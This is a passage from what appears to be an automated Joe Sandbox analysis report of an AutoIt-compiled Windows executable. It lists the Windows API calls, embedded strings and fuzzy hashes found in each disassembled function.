                                                                      • Part of subcall function 0063E968: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,0062C8B7,?,00002000,?,?,00000000,?,0062419E,?,?,?,006BDC00), ref: 0063E984
                                                                      • Part of subcall function 0062660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,006253B1,?,?,006261FF,?,00000000,00000001,00000000), ref: 0062662F
                                                                    • __wsplitpath.LIBCMT ref: 0062C93E
                                                                      • Part of subcall function 00641DFC: __wsplitpath_helper.LIBCMT ref: 00641E3C
                                                                    • _wcscpy.LIBCMT ref: 0062C953
                                                                    • _wcscat.LIBCMT ref: 0062C968
                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 0062C978
                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0062CABE
                                                                      • Part of subcall function 0062B337: _wcscpy.LIBCMT ref: 0062B36F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentDirectory$_wcscpy$FullNamePath__wsplitpath__wsplitpath_helper_wcscat
                                                                    • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                    • API String ID: 2258743419-1018226102
                                                                    • Opcode ID: eb46fc705cee92c416f0c8ce3748e6624e81534d666288e320a7494eeacb8eb2
                                                                    • Instruction ID: 4901660fc63b38ee3ac828d4944617ad09eb6b5193766692bb6ea0ff8ebcf512
                                                                    • Opcode Fuzzy Hash: eb46fc705cee92c416f0c8ce3748e6624e81534d666288e320a7494eeacb8eb2
                                                                    • Instruction Fuzzy Hash: 9012BE715083519FCB64EF24D891AAFBBEAAF99310F00491EF48993361DB30DA49CF56
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 0068CEFB
                                                                    • DestroyWindow.USER32(?,?), ref: 0068CF73
                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0068CFF4
                                                                    • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0068D016
                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0068D025
                                                                    • DestroyWindow.USER32(?), ref: 0068D042
                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00620000,00000000), ref: 0068D075
                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0068D094
                                                                    • GetDesktopWindow.USER32 ref: 0068D0A9
                                                                    • GetWindowRect.USER32(00000000), ref: 0068D0B0
                                                                    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0068D0C2
                                                                    • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0068D0DA
                                                                      • Part of subcall function 0063B526: GetWindowLongW.USER32(?,000000EB), ref: 0063B537
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memset
                                                                    • String ID: 0$tooltips_class32
                                                                    • API String ID: 3877571568-3619404913
                                                                    • Opcode ID: 2d430e4705bc351ef14963973b8cf5cf15e2a527dd069e696b657b07890761dd
                                                                    • Instruction ID: 16ff3829965a39554508c99a9cc95321025b782bb63658d89773953690debbc2
                                                                    • Opcode Fuzzy Hash: 2d430e4705bc351ef14963973b8cf5cf15e2a527dd069e696b657b07890761dd
                                                                    • Instruction Fuzzy Hash: 9B71DF70140345AFD724EF28CC85FA67BE6EB89704F44561DF9858B3A1D731E942DB22
                                                                    APIs
                                                                      • Part of subcall function 0063B34E: GetWindowLongW.USER32(?,000000EB), ref: 0063B35F
                                                                    • DragQueryPoint.SHELL32(?,?), ref: 0068F37A
                                                                      • Part of subcall function 0068D7DE: ClientToScreen.USER32(?,?), ref: 0068D807
                                                                      • Part of subcall function 0068D7DE: GetWindowRect.USER32(?,?), ref: 0068D87D
                                                                      • Part of subcall function 0068D7DE: PtInRect.USER32(?,?,0068ED5A), ref: 0068D88D
                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 0068F3E3
                                                                    • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0068F3EE
                                                                    • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0068F411
                                                                    • _wcscat.LIBCMT ref: 0068F441
                                                                    • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0068F458
                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 0068F471
                                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 0068F488
                                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 0068F4AA
                                                                    • DragFinish.SHELL32(?), ref: 0068F4B1
                                                                    • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0068F59C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                    • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                    • API String ID: 169749273-3440237614
                                                                    • Opcode ID: 21b9602607e7f579a210dff9bbd9cf12d4bb9d368ebb37838e1c014873163ec5
                                                                    • Instruction ID: 263250ea8f22ce62f60130bee7e833425317e7c7d8e9062a282ce2093e153a5d
                                                                    • Opcode Fuzzy Hash: 21b9602607e7f579a210dff9bbd9cf12d4bb9d368ebb37838e1c014873163ec5
                                                                    • Instruction Fuzzy Hash: 31615971508301AFC311EF64DC85E9FBBFAEF99710F000A1EF595961A1DB70AA09CB56
                                                                    APIs
                                                                    • VariantInit.OLEAUT32(00000000), ref: 0066AB3D
                                                                    • VariantCopy.OLEAUT32(?,?), ref: 0066AB46
                                                                    • VariantClear.OLEAUT32(?), ref: 0066AB52
                                                                    • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 0066AC40
                                                                    • __swprintf.LIBCMT ref: 0066AC70
                                                                    • VarR8FromDec.OLEAUT32(?,?), ref: 0066AC9C
                                                                    • VariantInit.OLEAUT32(?), ref: 0066AD4D
                                                                    • SysFreeString.OLEAUT32(00000016), ref: 0066ADDF
                                                                    • VariantClear.OLEAUT32(?), ref: 0066AE35
                                                                    • VariantClear.OLEAUT32(?), ref: 0066AE44
                                                                    • VariantInit.OLEAUT32(00000000), ref: 0066AE80
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                                    • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                    • API String ID: 3730832054-3931177956
                                                                    • Opcode ID: 4e58c4ba3d51264a6f418191424b2aa1bd8a1b14bc47e537ef0086ab2017d832
                                                                    • Instruction ID: cf869e8fdb29a0979fe56b386c6015e28fa470ba6e72299ec01ae2ef3022ba77
                                                                    • Opcode Fuzzy Hash: 4e58c4ba3d51264a6f418191424b2aa1bd8a1b14bc47e537ef0086ab2017d832
                                                                    • Instruction Fuzzy Hash: 1ED1E071A04615EBCB209FA6D885BAEF7B7FF09700F148059E405AB281DB74EC41DFA6
                                                                    APIs
                                                                    • CharUpperBuffW.USER32(?,?), ref: 006871FC
                                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00687247
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: BuffCharMessageSendUpper
                                                                    • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                    • API String ID: 3974292440-4258414348
                                                                    • Opcode ID: 5b7534f92ea24176bab4b983226cb0aa190d919f96d47330aff75bae5d6a7435
                                                                    • Instruction ID: 58aabdddf054747994bffbb68ac65c4543c9bdd5cfb04a15a2b8e662a26d4968
                                                                    • Opcode Fuzzy Hash: 5b7534f92ea24176bab4b983226cb0aa190d919f96d47330aff75bae5d6a7435
                                                                    • Instruction Fuzzy Hash: 74916E702087019BCB44FF10C851A6EBBA3AF94310F14595DF8966B3A3DB31ED4ADB99
                                                                    APIs
                                                                    • EnumChildWindows.USER32(?,0065CF50), ref: 0065CE90
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: ChildEnumWindows
                                                                    • String ID: 4+m$CLASS$CLASSNN$H+m$INSTANCE$L+m$NAME$P+m$REGEXPCLASS$T+m$TEXT
                                                                    • API String ID: 3555792229-4238710086
                                                                    • Opcode ID: 5ff09170f3923e20b451f32eabd2f4189b57853fe95b0541b4643d27acc8fcd9
                                                                    • Instruction ID: 9ab21f543cb768f619321455900225fd3f7725508ee17ec5749b8cf54d4659a0
                                                                    • Opcode Fuzzy Hash: 5ff09170f3923e20b451f32eabd2f4189b57853fe95b0541b4643d27acc8fcd9
                                                                    • Instruction Fuzzy Hash: FC919330900606AECB58DF60C482BEDFB77BF14315F50851AE859A7291DF30A95EDBE4
                                                                    APIs
                                                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0068E5AB
                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,0068BEAF), ref: 0068E607
                                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0068E647
                                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0068E68C
                                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0068E6C3
                                                                    • FreeLibrary.KERNEL32(?,00000004,?,?,?,?,0068BEAF), ref: 0068E6CF
                                                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0068E6DF
                                                                    • DestroyIcon.USER32(?,?,?,?,?,0068BEAF), ref: 0068E6EE
                                                                    • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0068E70B
                                                                    • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0068E717
                                                                      • Part of subcall function 00640FA7: __wcsicmp_l.LIBCMT ref: 00641030
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                                    • String ID: .dll$.exe$.icl
                                                                    • API String ID: 1212759294-1154884017
                                                                    • Opcode ID: 8bf4adfdabf40d17d91d0ced5d5232b3f4484ed6c60fe05cf1e5a1b944a8c4eb
                                                                    • Instruction ID: f219f7e25049e0241585742aa6aca5c44d412da5e27c49598c31cdbeb900da73
                                                                    • Opcode Fuzzy Hash: 8bf4adfdabf40d17d91d0ced5d5232b3f4484ed6c60fe05cf1e5a1b944a8c4eb
                                                                    • Instruction Fuzzy Hash: 2C61D171940615FAEB14EF64CC46FFE7BAABF18714F104215F915E61D0EB71A980CBA0
                                                                    APIs
                                                                      • Part of subcall function 0062936C: __swprintf.LIBCMT ref: 006293AB
                                                                      • Part of subcall function 0062936C: __itow.LIBCMT ref: 006293DF
                                                                    • CharLowerBuffW.USER32(?,?), ref: 0066D292
                                                                    • GetDriveTypeW.KERNEL32 ref: 0066D2DF
                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0066D327
                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0066D35E
                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0066D38C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: SendString$BuffCharDriveLowerType__itow__swprintf
                                                                    • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                    • API String ID: 1148790751-4113822522
                                                                    • Opcode ID: 614d7d8bdac6542ef12ec94b0eaecd5db7ea9c02412657c3bd364f54c8b3fe6d
                                                                    • Instruction ID: 2a64437de0ec3cb38030d257c57cda8ff19a7793d60f0372c1454f2bb4fab7bb
                                                                    • Opcode Fuzzy Hash: 614d7d8bdac6542ef12ec94b0eaecd5db7ea9c02412657c3bd364f54c8b3fe6d
                                                                    • Instruction Fuzzy Hash: 215157716047159FC740EF10D8819AEB7EAEF98718F04482DF896673A1DB31AE06CF96
                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000016,00000000,?,?,00693973,00000016,0000138C,00000016,?,00000016,006BDDB4,00000000,?), ref: 006626F1
                                                                    • LoadStringW.USER32(00000000,?,00693973,00000016), ref: 006626FA
                                                                    • GetModuleHandleW.KERNEL32(00000000,00000016,?,00000FFF,?,?,00693973,00000016,0000138C,00000016,?,00000016,006BDDB4,00000000,?,00000016), ref: 0066271C
                                                                    • LoadStringW.USER32(00000000,?,00693973,00000016), ref: 0066271F
                                                                    • __swprintf.LIBCMT ref: 0066276F
                                                                    • __swprintf.LIBCMT ref: 00662780
                                                                    • _wprintf.LIBCMT ref: 00662829
                                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00662840
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: HandleLoadModuleString__swprintf$Message_wprintf
                                                                    • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                    • API String ID: 618562835-2268648507
                                                                    • Opcode ID: 2f96b088d60ecb5857529533b0e05d396c413eae756c0a5878e59964a2983545
                                                                    • Instruction ID: a1a964b0551e969ea65b988108da37de66e08db521885ecbc4e384ae433cc183
                                                                    • Opcode Fuzzy Hash: 2f96b088d60ecb5857529533b0e05d396c413eae756c0a5878e59964a2983545
                                                                    • Instruction Fuzzy Hash: 9F415E72800629BBCB54FBE0ED96DEEB77AAF15340F100069B50277092EA706F59CF65
                                                                    APIs
                                                                    • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0066D0D8
                                                                    • __swprintf.LIBCMT ref: 0066D0FA
                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 0066D137
                                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0066D15C
                                                                    • _memset.LIBCMT ref: 0066D17B
                                                                    • _wcsncpy.LIBCMT ref: 0066D1B7
                                                                    • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0066D1EC
                                                                    • CloseHandle.KERNEL32(00000000), ref: 0066D1F7
                                                                    • RemoveDirectoryW.KERNEL32(?), ref: 0066D200
                                                                    • CloseHandle.KERNEL32(00000000), ref: 0066D20A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                    • String ID: :$\$\??\%s
                                                                    • API String ID: 2733774712-3457252023
                                                                    • Opcode ID: 846c49dcace1f81bae8db510ebf64f992d7a70c7ee3b345063dcecd56069ad28
                                                                    • Instruction ID: 454ed49fb85175f3f0cb5806df7562f6c88d44bb48e3e7b17d5dc65dc2ce6913
                                                                    • Opcode Fuzzy Hash: 846c49dcace1f81bae8db510ebf64f992d7a70c7ee3b345063dcecd56069ad28
                                                                    • Instruction Fuzzy Hash: 56319671A00119ABDB21DFA0DC49FEB77BEEF8A740F1040B9F609D6160E770A7458B24
                                                                    APIs
                                                                    • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,0068BEF4,?,?), ref: 0068E754
                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,0068BEF4,?,?,00000000,?), ref: 0068E76B
                                                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,0068BEF4,?,?,00000000,?), ref: 0068E776
                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,0068BEF4,?,?,00000000,?), ref: 0068E783
                                                                    • GlobalLock.KERNEL32(00000000), ref: 0068E78C
                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,0068BEF4,?,?,00000000,?), ref: 0068E79B
                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 0068E7A4
                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,0068BEF4,?,?,00000000,?), ref: 0068E7AB
                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,0068BEF4,?,?,00000000,?), ref: 0068E7BC
                                                                    • OleLoadPicture.OLEAUT32(?,00000000,00000000,006AD9BC,?), ref: 0068E7D5
                                                                    • GlobalFree.KERNEL32(00000000), ref: 0068E7E5
                                                                    • GetObjectW.GDI32(00000000,00000018,?), ref: 0068E809
                                                                    • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 0068E834
                                                                    • DeleteObject.GDI32(00000000), ref: 0068E85C
                                                                    • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0068E872
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                    • String ID:
                                                                    • API String ID: 3840717409-0
                                                                    • Opcode ID: 78a01480146986ca1ba93602c4117c3522c960e1fd306f96c689849a3cb4a2ba
                                                                    • Instruction ID: c7b725f99dc98ea3d20397dded482498a77a27a377108f507f051c53abbb318b
                                                                    • Opcode Fuzzy Hash: 78a01480146986ca1ba93602c4117c3522c960e1fd306f96c689849a3cb4a2ba
                                                                    • Instruction Fuzzy Hash: 7341F875600204EFDB11AF65DC88EAE7BBAEF8A715F108168F90697260D731AD41DF60
                                                                    APIs
                                                                    • __wsplitpath.LIBCMT ref: 0067076F
                                                                    • _wcscat.LIBCMT ref: 00670787
                                                                    • _wcscat.LIBCMT ref: 00670799
                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 006707AE
                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 006707C2
                                                                    • GetFileAttributesW.KERNEL32(?), ref: 006707DA
                                                                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 006707F4
                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00670806
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                    • String ID: *.*
                                                                    • API String ID: 34673085-438819550
                                                                    • Opcode ID: f551100ab9f6b95b7802c4693d20f720768ba4489d1a32b3e9797e61b47937ce
                                                                    • Instruction ID: 3670305ab915ec7a73316d1cb46d63707065b8ac379a696a695de68f937c576c
                                                                    • Opcode Fuzzy Hash: f551100ab9f6b95b7802c4693d20f720768ba4489d1a32b3e9797e61b47937ce
                                                                    • Instruction Fuzzy Hash: EE817071504301DFEB64EF24C8559AEB7EABBC9304F14882EF889D7351E630E9558FA2
                                                                    APIs
                                                                      • Part of subcall function 0063B34E: GetWindowLongW.USER32(?,000000EB), ref: 0063B35F
                                                                    • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0068EF3B
                                                                    • GetFocus.USER32 ref: 0068EF4B
                                                                    • GetDlgCtrlID.USER32(00000000), ref: 0068EF56
                                                                    • _memset.LIBCMT ref: 0068F081
                                                                    • GetMenuItemInfoW.USER32 ref: 0068F0AC
                                                                    • GetMenuItemCount.USER32(00000000), ref: 0068F0CC
                                                                    • GetMenuItemID.USER32(?,00000000), ref: 0068F0DF
                                                                    • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 0068F113
                                                                    • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 0068F15B
                                                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0068F193
                                                                    • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0068F1C8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
